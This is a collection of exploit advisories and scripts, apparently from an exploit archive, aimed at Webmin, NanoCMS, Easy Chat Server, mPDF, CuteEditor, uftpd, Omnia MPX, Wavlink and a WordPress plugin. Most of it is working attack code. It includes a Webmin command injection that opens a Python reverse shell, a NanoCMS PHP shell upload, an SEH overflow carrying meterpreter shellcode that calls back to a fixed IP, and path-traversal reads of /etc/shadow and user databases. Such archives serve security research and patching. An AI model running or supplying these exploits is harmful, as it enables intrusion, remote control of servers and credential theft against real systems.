# Reference: https://securitrust.fr
# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551

#Product:
WordPress Plugin Duplicator < 1.4.7

#Vulnerability:
1-It allows an attacker to download the backup file.

#Proof-Of-Concept:
1-Backup download.
The backup file can be downloaded using the "is_daws" parameter.
http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
            
# Exploit Title: Wavlink WN530HG4 - Password Disclosure
# Date: 2022-06-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M30HG4.V5030.191116
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34047
# Tested on: Windows

# Exploit

view-source:http://IP_address/set_safety.shtml?r=52300
search for var syspasswd="
you will find the username and the password
            
# Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal
# Google Dork: N/A
# Date: November 17th, 2021
# Exploit Author: Stefan Hesselman
# Vendor Homepage: http://phphtmledit.com/
# Software Link: http://phphtmledit.com/download/phphtmledit.zip
# Version: 6.6
# Tested on: Windows Server 2019
# CVE : N/A

There is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root.

File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121

Vulnerable code:
[SNIP]
	// Maps a web-relative path onto a filesystem path.
	// $input_path comes straight from $_GET["filename"] / $_GET["newname"] in
	// the caller shown below and is never canonicalised: "../" or "..\" segments
	// survive into the returned string, which is the traversal this advisory
	// describes. With $absolute_path set, the $virtual_path prefix is stripped
	// case-insensitively and $absolute_path is prepended; otherwise the path is
	// appended to DOCUMENT_ROOT.
	// Mitigation (defender note): resolve the result with realpath() and reject
	// it unless it still lies under the intended gallery directory; the caller
	// should additionally reject path separators in the supplied file name.
	function ServerMapPath($input_path,$absolute_path,$virtual_path)
	{
	  if($absolute_path!="")
	  {
		return $absolute_path.str_ireplace($virtual_path,"",$input_path);
	  }
	  else
	  {
		// The parentheses are misplaced: strtoupper() is applied to the boolean
		// result of the === comparison, not to the substr() output. It still
		// behaves as intended by accident — strtoupper(true) is "1" (truthy)
		// and strtoupper(false) is "" (falsy).
		if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN'))
		{    
// Windows fallback: derive DOCUMENT_ROOT from SCRIPT_FILENAME or PATH_TRANSLATED
// when the server did not set it.
if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) { 
	$_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));
} 
if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) { 
  $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
				return $_SERVER["DOCUMENT_ROOT"].$input_path;
		}
		else
		{
			// ucfirst() on a Unix document root only capitalises its first character.
			return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path; 
		}
	  }
	}
[SNIP]

ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file.

File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56

Vulnerable function (renamefile, line 57):
[SNIP]
switch ($action)
{
[SNIP]
	case "renamefile":
		rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath));
		print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>";
		break;
[SNIP]

$input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes:

C:\Inetpub\wwwroot\..\..\..\poc.html

Final result: writes poc.html to the webroot.

STEPS:

1. Create a poc.html file (XSS PoC will do).

<HTML>
<title>Path Traversal PoC</title>
<BODY>
<h1>PoC</h1>
<script>alert('directory traversal');</script>
</BODY>
</HTML>

2. Upload poc.html via the "Insert Templates" page using the "Upload files" option.
3. Select poc.html and select "Rename File".
4. Click on the pencil icon to the right of the poc.html file.
5. Rename file to "..\..\..\poc.html".
6. Press OK. poc.html is written three directories up.

This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed.
            
# Exploit Title: mPDF 7.0 - Local File Inclusion
# Google Dork: N/A
# Date: 2022-07-23
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://mpdf.github.io/
# Software Link: https://mpdf.github.io/
# Version: CuteNews
# Tested on: Ubuntu 20.04, mPDF 7.0.x
# CVE: N/A

#!/usr/bin/env python3

from urllib.parse import quote
from cmd import Cmd
from base64 import b64encode

class Terminal(Cmd):
    """Minimal prompt loop built on cmd.Cmd.

    Any line that is not one of Cmd's built-in commands (e.g. ``help``)
    reaches default(), which forwards it to payload_gen() as the file name.
    """
    prompt = "\nFile >> "
    def default(self, args):
        # `args` is the full line typed at the prompt, passed through untouched.
        payload_gen(args)
def banner():
    """Print the ASCII-art banner to stdout.

    The art is written as a raw string: it contains many stray backslashes,
    none of which forms a valid escape, so a raw literal prints exactly the
    same bytes while avoiding invalid-escape warnings.
    """
    print(r"""                          _____  _____  ______   ______ ___  __   __                  _       _ _   
                         |  __ \|  __ \|  ____| |____  / _ \ \ \ / /                 | |     (_) |  
               _ __ ___  | |__) | |  | | |__        / / | | | \ V /    _____  ___ __ | | ___  _| |_ 
               | '_ ` _ \|  ___/| |  | |  __|      / /| | | |  > <    / _ \ \/ / '_ \| |/ _ \| | __|
               | | | | | | |    | |__| | |        / / | |_| | / . \  |  __/>  <| |_) | | (_) | | |_ 
               |_| |_| |_|_|    |_____/|_|       /_/ (_)___(_)_/ \_\  \___/_/\_\ .__/|_|\___/|_|\__|
                                                                               | |                  
                                                                               |_|   """)
def payload_gen(fname):
    """Print URL-encoded and base64-encoded forms of an mPDF <annotation> tag.

    ``fname`` is inserted verbatim into the tag's ``file``, ``content`` and
    ``title`` attributes; no quoting or validation is applied, so a value
    containing ``"`` breaks the markup. Output goes to stdout; nothing is
    returned.

    Defender note: the ``file`` attribute of ``<annotation>`` is the input
    this advisory is about — HTML that originates from untrusted users should
    have this tag stripped or rejected before it is handed to mPDF.
    """
    payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'
    encoded_payload = quote(payload)
    print("[+] Replace the content with the payload below")

    print(f"Url encoded payload:\n{encoded_payload}\n")
    # Note: the base64 variant encodes the already URL-encoded text, not the raw tag.
    base64enc = b64encode(encoded_payload.encode())
    print(f"Base64 encoded payload:\n{base64enc.decode()}\n")
if __name__ == "__main__":
    # Show the banner, then hand control to the interactive prompt; each line
    # entered there is forwarded to payload_gen() as a file name.
    banner()
    print("Enter Filename eg. /etc/passwd")
    Terminal().cmdloop()
            
# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-25
# Exploit Author: Emir Polat
# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://www.webmin.com/download.html
# Version: < 1.997
# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
# CVE: CVE-2022-36446

import argparse
import requests
from bs4 import BeautifulSoup

def login(args):
    """Authenticate against Webmin and populate the module globals.

    Posts ``args.username`` / ``args.password`` to session_login.cgi on port
    10000 of ``args.target`` (which must already include its scheme, e.g.
    ``https://webmin.localhost``), then fetches sysinfo.cgi with the returned
    ``sid`` cookie and collects every ``data-user`` attribute in the page.

    Returns True when at least one ``data-user`` value was found (taken as
    evidence of a logged-in session), False otherwise.

    Side effects: sets the module globals ``session`` (the requests.Session)
    and ``sysUser`` (list[str]), both read later by exploit().
    Raises KeyError if the login response did not set a ``sid`` cookie.
    """
    global session
    global sysUser

    session = requests.Session()
    loginUrl = f"{args.target}:10000/session_login.cgi"
    infoUrl = f"{args.target}:10000/sysinfo.cgi"

    username = args.username
    password = args.password
    data = {'user': username, 'pass': password}

    # verify=False disables TLS certificate validation for both requests; the
    # --ssl flag parsed in __main__ is never consulted here. The purpose of the
    # 'testing' cookie is not evident from this script — TODO confirm.
    # (The local name `login` shadows this function inside its own body.)
    login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})
    sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']})

    bs = BeautifulSoup(sysInfo.text, 'html.parser')
    sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs]

    if sysUser:
        return True
    else:
        return False

def exploit(args):
    """Log in, check access to the package-updates module, and submit the payload.

    Relies on login() having set the module globals ``session`` and
    ``sysUser``. The payload is sent as the ``u`` (package name) field of
    update.cgi; per the advisory that field ends up in a shell command on the
    server. Prints progress to stdout; returns None.

    Raises IndexError if the package-updates page contains no element with a
    ``data-module`` attribute (``updateAccess[0]`` is indexed unguarded).
    """
    payload = f"""
    1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport}));
    os.dup2(s.fileno(),0);
    os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")');
    """

    updateUrl = f"{args.target}:10000/package-updates"
    exploitUrl = f"{args.target}:10000/package-updates/update.cgi"

    exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'}

    if login(args):
        print("[+] Successfully Logged In !")
        print(f"[+] Session Cookie => sid={session.cookies['sid']}")
        print(f"[+] User Found  => {sysUser[0]}")

        # These requests do not pass verify=False; the session default applies.
        res = session.get(updateUrl)
        bs = BeautifulSoup(res.text, 'html.parser')

        updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]

        if updateAccess[0] == "package-updates":
            print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>")
            print(f"[+] Exploit starting ... ")
            print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}")

            # Webmin checks the Referer header against its own URL; it is set
            # to the update page so the POST is not rejected as cross-site.
            session.headers.update({'Referer'  : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})
            session.post(exploitUrl, data=exploitData)
        else:
            print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>")
    else:
        print("[-] Login Failed !")

if __name__ == '__main__':
    # --target must include its scheme (e.g. https://host); ":10000" is appended
    # by login()/exploit(). --listenport is interpolated into the payload as a
    # plain string, so no numeric validation happens here. --ssl is accepted
    # but never read anywhere in this script.
    parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)")
    parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)
    parser.add_argument('-u', '--username', help='Username For Login', required=True)
    parser.add_argument('-p', '--password', help='Password For Login', required=True)
    parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
    parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)
    parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False)
    args = parser.parse_args()
    exploit(args)
            
# Exploit Title: NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-26
# Exploit Author: p1ckzi
# Vendor Homepage: https://github.com/kalyan02/NanoCMS
# Version: NanoCMS v0.4
# Tested on: Linux Mint 20.3
# CVE: N/A
#
# Description:
# this script uploads a php reverse shell to the target.
# NanoCMS does not sanitise the data of an authenticated user while creating
# webpages. pages are saved with .php extensions by default, allowing an
# authenticated attacker access to the underlying system:
# https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt

#!/usr/bin/env python3

import argparse
import bs4
import errno
import re
import requests
import secrets
import sys


def arguments():
    """Parse the command line and publish the namespace as ``arguments.option``.

    Positional: ``address`` (base URL of the NanoCMS server) and ``file``
    (the PHP file to upload). Options: ``-u/--user`` (default "admin"),
    ``-p/--passwd`` (default "demo"), and the switches ``-e/--execute``,
    ``-a/--accessible`` and ``-n/--no-colour`` (all default False).
    The parsed namespace is stored on the function object rather than
    returned; the other functions in this script read ``arguments.option``.
    """
    prog = sys.argv[0]
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description=(
            f"{prog} exploits authenticated file upload"
            "\nand remote code execution in NanoCMS v0.4"
        ),
        epilog=(
            "examples:"
            f"\n\tpython3 {prog} http://10.10.10.10/ rev.php"
            f"\n\tpython3 {prog} http://hostname:8080 rev-shell.php -a"
            f"\n\t./{prog} https://10.10.10.10 rev-shell -n -e -u 'user'"
        ),
    )
    add = parser.add_argument

    # Positional arguments.
    add(
        "address",
        help="schema/ip/hostname, port, sub-directories to the vulnerable NanoCMS server",
    )
    add("file", help="php file to upload")

    # Credentials; the defaults are admin/demo.
    add("-u", "--user", default="admin", help="username")
    add("-p", "--passwd", default="demo", help="password")

    # Boolean switches, all off by default.
    switches = (
        (("-e", "--execute"),
         "attempts to make a request to the uploaded file "
         "(more useful if uploading a reverse shell)"),
        (("-a", "--accessible"),
         "turns off features which may negatively affect screen readers"),
        (("-n", "--no-colour"), "removes colour output"),
    )
    for flags, text in switches:
        add(*flags, help=text, action="store_true", default=False)

    arguments.option = parser.parse_args()


# settings for terminal output defined by user in term_settings().
class settings():
    """Mutable namespace for terminal output strings, filled in by term_settings().

    ``c0``..``c2`` hold ANSI colour sequences (reset, red, green) and
    ``i1``..``i4`` the line markers ("[+] ", "[!] ", "[i] ", "$ "). All start
    empty, so output is plain until term_settings() runs.
    """
    # colours: reset, red, green.
    c0 = c1 = c2 = ""

    # line markers for info / warning / note / command lines.
    i1 = i2 = i3 = i4 = ""


# checks for terminal setting flags supplied by arguments().
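def term_settings():
    """Fill in `settings` from the parsed flags and print a banner.

    Reads ``arguments.option.accessible`` and ``arguments.option.no_colour``
    (populated by arguments()):

    * ``--accessible``: markers and colours stay empty; small_banner() is shown.
    * ``--no-colour``: plain "[+] "/"[!] "/"[i] "/"$ " markers, no colours.
    * otherwise: the same markers plus ANSI red/green/reset sequences.

    Returns None.
    """
    option = arguments.option
    if option.accessible:
        small_banner()
        return

    settings.i1 = "[+] "
    settings.i2 = "[!] "
    settings.i3 = "[i] "
    settings.i4 = "$ "
    # Only two flags exist, so once `accessible` is false the remaining choice
    # is colour on/off; the former trailing "something went horribly wrong"
    # branch could never be reached and has been dropped.
    if not option.no_colour:
        settings.c0 = "\u001b[0m"       # reset.
        settings.c1 = "\u001b[38;5;1m"  # red.
        settings.c2 = "\u001b[38;5;2m"  # green.
    banner()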


# default terminal banner (looks prettier when run lol)
def banner():
    """Print the multi-line ASCII-art banner to stdout.

    The art is one implicitly concatenated string literal; the doubled
    backslashes are ordinary escapes producing single backslashes.
    """
    print(
        "\n                                                  .__           .__"
        "  .__   "
        "\n  ____ _____    ____   ____   ____   _____   _____|  |__   ____ |  "
        "| |  |  "
        "\n /    \\__   \\  /    \\ /  _ \\_/ ___\\ /     \\ /  ___/  |  \\_/ "
        "__ \\|  | |  |  "
        "\n|   |  \\/ __ \\|   |  (  <_> )  \\___|  Y Y  \\___  \\|   Y  \\  _"
        "__/|  |_|  |__"
        "\n|___|  (____  /___|  /\\____/ \\___  >__|_|  /____  >___|  /\\___  "
        ">____/____/"
        "\n     \\/     \\/     \\/            \\/      \\/     \\/     \\/   "
        "  \\/"
    )


def small_banner():
    """Print the reduced banner (script name plus one descriptive line).

    Used instead of banner() when screen-reader-friendly output is requested.
    """
    script = sys.argv[0]
    print(f"{script}\nNanoCMS authenticated file upload and rce...")


# appends a '/' if not supplied at the end of the address.
def address_check(address):
    """Ensure the configured address ends with a slash.

    Checks ``address`` for a trailing "/"; when it is missing, a "/" is
    appended to ``arguments.option.address`` (the parameter itself is not
    modified). When the slash is already present only a blank line is
    printed. Returns None.
    """
    if re.search('/$', address) is None:
        arguments.option.address += "/"
    else:
        print('')


# creates a new filename for each upload.
# errors occur if the filename is the same as a previously uploaded one.
def random_filename():
    """Store a fresh 8-character hex name on ``random_filename.name``.

    Four random bytes from ``secrets`` are rendered as lowercase hex; the
    value is kept on the function object rather than returned.
    """
    random_filename.name = secrets.token_bytes(4).hex()


# note: after a successful login, credentials are saved, so further reuse
# of the script will most likely not require correct credentials.
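def login(address, user, passwd):
    """Authenticate to the NanoCMS admin page at ``address``.

    POSTs ``user``/``passwd`` to data/nanoadmin.php and exits with status 1
    when the response contains the CMS's wrong-credentials message (the
    original printed "could sign in" on that path; the message now reads
    "could not sign in").  Success is assumed for any other response body.

    Authentication state is carried by the hard-coded PHPSESSID cookie: the
    same value is sent by exploit(), so the server-side session created here
    is what authorises the later upload.  TLS verification is disabled
    (``verify=False``), so use only against lab targets.

    Args:
        address: Base URL of the target, already ending in '/'.
        user: Admin username.
        passwd: Admin password.

    Raises:
        requests exceptions (Timeout, ConnectionError, InvalidURL, ...) are
        left to propagate to main(), which reports them.
    """
    post_header = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "
        "Gecko/20100101 Firefox/91.0",
        "Accept": "text/html,application/xhtml+xml,"
        "application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        # Kept from the original; requests replaces it with the real length
        # once the form body is encoded.
        "Content-Length": "",
        "Connection": "close",
        "Referer": f"{address}data/nanoadmin.php",
        # Fixed session id shared with exploit() — see module note above login().
        "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",
        "Upgrade-Insecure-Requests": "1",
    }
    post_data = {
        "user": f"{user}",
        "pass": f"{passwd}"
    }

    url_request = requests.post(
        address + 'data/nanoadmin.php?',
        headers=post_header,
        data=post_data,
        verify=False,
        timeout=30
    )
    # Failure is detected purely from the page text; a changed error string in
    # another NanoCMS build would be reported as a successful login.
    if 'Error : wrong Username or Password' in url_request.text:
        print(
            f"{settings.c1}{settings.i2}could not "
            f"sign in with {user}/"
            f"{passwd}.{settings.c0}"
        )
        sys.exit(1)
    print(
        f"{settings.c2}{settings.i1}logged in successfully."
        f"{settings.c0}"
    )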


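def exploit(address, file, name):
    """Upload the contents of ``file`` as a new NanoCMS page titled ``name``.

    NanoCMS stores each page as data/pages/<title>.php, so a PHP payload
    becomes a web-reachable script.  The request rides the authenticated
    session via the same hard-coded PHPSESSID cookie login() uses.

    Fixes relative to the original: the ``file`` and ``name`` parameters are
    now actually used (it read ``arguments.option.file`` and
    ``random_filename.name`` instead, and shadowed ``file`` with the open
    handle), any HTTP error status — not only 404 — is treated as a failed
    upload, and the failure message names the file rather than the address.

    Args:
        address: Base URL of the target, already ending in '/'.
        file: Local path of the payload to upload.
        name: Page title; becomes the filename stem of the upload.

    Raises:
        FileNotFoundError: if ``file`` does not exist (reported by main()).
    """
    # rstrip() is kept from the original: it drops trailing whitespace only,
    # leaving a closing '?>' intact.
    with open(file, 'r') as payload:
        file_contents = payload.read().rstrip()

    post_header = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "
        "Gecko/20100101 Firefox/91.0",
        "Accept": "text/html,application/xhtml+xml,"
        "application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": "",
        "Connection": "close",
        "Referer": f"{address}data/nanoadmin.php?action="
        "addpage",
        # Same fixed session id as login(), which is what authorises this POST.
        "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",
        "Upgrade-Insecure-Requests": "1",
    }

    post_data = {
        "title": f"{name}",
        "save": "Add Page",
        "check_sidebar": "sidebar",
        "content": f"{file_contents}"
    }

    url_request = requests.post(
        address + 'data/nanoadmin.php?action=addpage',
        headers=post_header,
        data=post_data,
        verify=False,
        timeout=30
    )
    # Any 4xx/5xx means the page was not created.  2xx/3xx is taken as
    # success, as before; the location printed below is only a prediction.
    if url_request.status_code >= 400:
        print(
            f"{settings.c1}{settings.i2}{file} could "
            f"not be uploaded (HTTP {url_request.status_code}).{settings.c0}"
        )
        sys.exit(1)
    print(
        f"{settings.c2}{settings.i1}file posted."
        f"{settings.c0}"
    )

    print(
        f"{settings.i3}if successful, file location should be at:"
        f"\n{address}data/pages/{name}.php"
    )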


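def execute(address, file, name):
    """Request the uploaded page so the server executes it.

    Fetches data/pages/<name>.php.  A 404 is reported (upload missing, or
    removed e.g. by antivirus); any other status ends the script via
    sys.exit(), as in the original.

    The ``name`` parameter is now used for the URL (the original ignored it
    and read ``random_filename.name``).  No timeout is set, matching the
    original; a reverse-shell payload would presumably hold this request open
    while the shell runs — confirm before adding one.

    Args:
        address: Base URL of the target, already ending in '/'.
        file: Local payload path, used only in the failure message.
        name: Page title chosen for the upload.
    """
    print(f"{settings.i3}making web request to uploaded file.")
    print(f"{settings.i3}check listener if reverse shell uploaded.")
    url_request = requests.get(
        address + f'data/pages/{name}.php',
        verify=False
    )
    if url_request.status_code == 404:
        print(
            f"{settings.c1}{settings.i2}{file} could "
            f"not be found."
            f"\n{settings.i2}antivirus may be blocking your upload."
            f"{settings.c0}"
        )
    else:
        sys.exit()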


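def main():
    """Run the exploit end to end: parse options, log in, upload, optionally trigger.

    Login and upload happen in every mode; the execute option only adds the
    final GET that runs the uploaded page (the original duplicated the
    login/upload calls in both branches).  Expected failures — interrupt,
    timeout, connection refused, missing payload file, malformed URL — are
    reported in one line and the script exits.
    """
    try:
        arguments()
        term_settings()
        address_check(arguments.option.address)
        random_filename()  # must run before exploit(): it picks the page title
        login(
            arguments.option.address,
            arguments.option.user,
            arguments.option.passwd
        )
        exploit(
            arguments.option.address,
            arguments.option.file,
            random_filename.name,
        )
        if arguments.option.execute:
            execute(
                arguments.option.address,
                arguments.option.file,
                random_filename.name,
            )
    except KeyboardInterrupt:
        print(f"\n{settings.i3}quitting.")
        sys.exit()
    except requests.exceptions.Timeout:
        print(
            f"{settings.c1}{settings.i2}the request timed out "
            f"while attempting to connect.{settings.c0}"
        )
        sys.exit()
    except requests.ConnectionError:
        print(
            f"{settings.c1}{settings.i2}could not connect "
            f"to {arguments.option.address}{settings.c0}"
        )
        sys.exit()
    except FileNotFoundError:
        print(
            f"{settings.c1}{settings.i2}{arguments.option.file} "
            f"could not be found.{settings.c0}"
        )
        # Explicit exit for consistency with the other handlers (the original
        # fell through and returned normally, which also ended with status 0).
        sys.exit()
    except (
        requests.exceptions.MissingSchema,
        requests.exceptions.InvalidURL,
        requests.exceptions.InvalidSchema
    ):
        print(
            f"{settings.c1}{settings.i2}a valid schema and address "
            f"must be supplied.{settings.c0}"
        )
        sys.exit()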


# Script entry point; all work, including argument parsing, happens in main().
if __name__ == "__main__":
    main()
            
# Exploit Title: Omnia MPX 1.5.0+r1 - Path Traversal
# Date: 24/7/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.telosalliance.com/
# Software Link: https://support.telosalliance.com/article/934ixoaz3l-mpx-node-release-notes-and-update-instructions
# Version: 1.5.0+r1
# Tested on: MacOS
# PoC:
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/passwd
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/shadow

User database (userDB.json under the node's appConfig directory, fetched through the same unsanitised fname parameter):
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json
            
# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
# Exploit Author: r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py <victim-ip> <port>
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
# CVE: CVE-2004-2466 
# Installer: http://www.echatserver.com/
# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)

#!/usr/bin/python3

import sys
import socket
from struct import pack

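# Target parameters.  The SEH chain below is specific to this Easy Chat Server
# build and its bundled SSLEAY32.DLL; the shellcode is a pre-generated msfvenom
# reverse_tcp stub calling back to 192.168.0.162:1990 and must be regenerated
# (same bad chars: \x00 \x20) for any other listener.
if len(sys.argv) != 3:
    sys.exit(f"usage: {sys.argv[0]} <victim-ip> <port>")

host = sys.argv[1]  # Receive IP from user
port = int(sys.argv[2])  # Receive port from user

junk = b"A" * 217  # padding up to the SEH record
nseh = pack("<L", 0x06eb9090)  # nSEH: nop, nop, jmp short +6 (over the handler)
seh = pack("<L", 0x1001ae86)  # handler: pop pop ret @ 0x1001AE86 in SSLEAY32.DLL

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20" -v shellcode
shellcode = b"\x90" * 16  # NOP sled landed on by the short jump
shellcode += b"\xbb\xb4\xa4\x34\xc3\xdd\xc1\xd9\x74\x24\xf4\x5a\x33"
shellcode += b"\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\x5e\x58\xd6"
shellcode += b"\x36\x62\x49\x95\xb9\x9a\x8a\xfa\x30\x7f\xbb\x3a\x26"
shellcode += b"\xf4\xec\x8a\x2c\x58\x01\x60\x60\x48\x92\x04\xad\x7f"
shellcode += b"\x13\xa2\x8b\x4e\xa4\x9f\xe8\xd1\x26\xe2\x3c\x31\x16"
shellcode += b"\x2d\x31\x30\x5f\x50\xb8\x60\x08\x1e\x6f\x94\x3d\x6a"
shellcode += b"\xac\x1f\x0d\x7a\xb4\xfc\xc6\x7d\x95\x53\x5c\x24\x35"
shellcode += b"\x52\xb1\x5c\x7c\x4c\xd6\x59\x36\xe7\x2c\x15\xc9\x21"
shellcode += b"\x7d\xd6\x66\x0c\xb1\x25\x76\x49\x76\xd6\x0d\xa3\x84"
shellcode += b"\x6b\x16\x70\xf6\xb7\x93\x62\x50\x33\x03\x4e\x60\x90"
shellcode += b"\xd2\x05\x6e\x5d\x90\x41\x73\x60\x75\xfa\x8f\xe9\x78"
shellcode += b"\x2c\x06\xa9\x5e\xe8\x42\x69\xfe\xa9\x2e\xdc\xff\xa9"
shellcode += b"\x90\x81\xa5\xa2\x3d\xd5\xd7\xe9\x29\x1a\xda\x11\xaa"
shellcode += b"\x34\x6d\x62\x98\x9b\xc5\xec\x90\x54\xc0\xeb\xd7\x4e"
shellcode += b"\xb4\x63\x26\x71\xc5\xaa\xed\x25\x95\xc4\xc4\x45\x7e"
shellcode += b"\x14\xe8\x93\xd1\x44\x46\x4c\x92\x34\x26\x3c\x7a\x5e"
shellcode += b"\xa9\x63\x9a\x61\x63\x0c\x31\x98\xe4\xf3\x6e\xd4\xf0"
shellcode += b"\x9b\x6c\x18\xf8\xe6\xf8\xfe\x90\x08\xad\xa9\x0c\xb0"
shellcode += b"\xf4\x21\xac\x3d\x23\x4c\xee\xb6\xc0\xb1\xa1\x3e\xac"
shellcode += b"\xa1\x56\xcf\xfb\x9b\xf1\xd0\xd1\xb3\x9e\x43\xbe\x43"
shellcode += b"\xe8\x7f\x69\x14\xbd\x4e\x60\xf0\x53\xe8\xda\xe6\xa9"
shellcode += b"\x6c\x24\xa2\x75\x4d\xab\x2b\xfb\xe9\x8f\x3b\xc5\xf2"
shellcode += b"\x8b\x6f\x99\xa4\x45\xd9\x5f\x1f\x24\xb3\x09\xcc\xee"
shellcode += b"\x53\xcf\x3e\x31\x25\xd0\x6a\xc7\xc9\x61\xc3\x9e\xf6"
shellcode += b"\x4e\x83\x16\x8f\xb2\x33\xd8\x5a\x77\x43\x93\xc6\xde"
shellcode += b"\xcc\x7a\x93\x62\x91\x7c\x4e\xa0\xac\xfe\x7a\x59\x4b"
shellcode += b"\x1e\x0f\x5c\x17\x98\xfc\x2c\x08\x4d\x02\x82\x29\x44"

# The overflow is in the username parameter; the remaining headers are left
# exactly as in the original PoC (Host/Referer still carry the author's lab
# address) so the request bytes are unchanged.
request = (
    b"GET /chat.ghp?username=" + junk + nseh + seh + shellcode
    + b"&password=&room=1&sex=1 HTTP/1.1\r\n"
    + b"User-Agent: Mozilla/4.0\r\n"
    + b"Host: 192.168.1.136:80\r\n"
    + b"Accept-Language: en-us\r\n"
    + b"Accept-Encoding: gzip, deflate\r\n"
    + b"Referer: http://192.168.1.136\r\n"
    + b"Connection: Keep-Alive\r\n\r\n"
)

print("[*] Sending evil buffer...")
# create_connection inside `with` closes the socket even if connect or send
# fails; sendall (unlike send) does not stop after a partial write.  The
# timeout keeps an unreachable target from hanging the script forever.
with socket.create_connection((host, port), timeout=10) as s:
    s.sendall(request)
print("[+] Done!")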
            
# Exploit Title: uftpd 2.10 - Directory Traversal (Authenticated)
# Google Dork: N/A
# Exploit Author: Aaron Esau (arinerron)
# Vendor Homepage: https://github.com/troglobit/uftpd
# Software Link: https://github.com/troglobit/uftpd
# Version: 2.7 to 2.10
# Tested on: Linux
# CVE : CVE-2020-20277
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2020-20277
# Reference: https://arinerron.com/blog/posts/6
#Product: uftpd 2.7 to 2.10

#Proof-Of-Concept:
1-Once authenticated, arbitrary files can be read through directory traversal if the service is not running as root. If anonymous login is enabled, the same files can be read without any authentication.

#Steps
1-Setup nc listener on attacking machine on TCP port 1258
nc -lnvp 1258

2-Login to the FTP service

3-List files 
ftp> ls ../../../

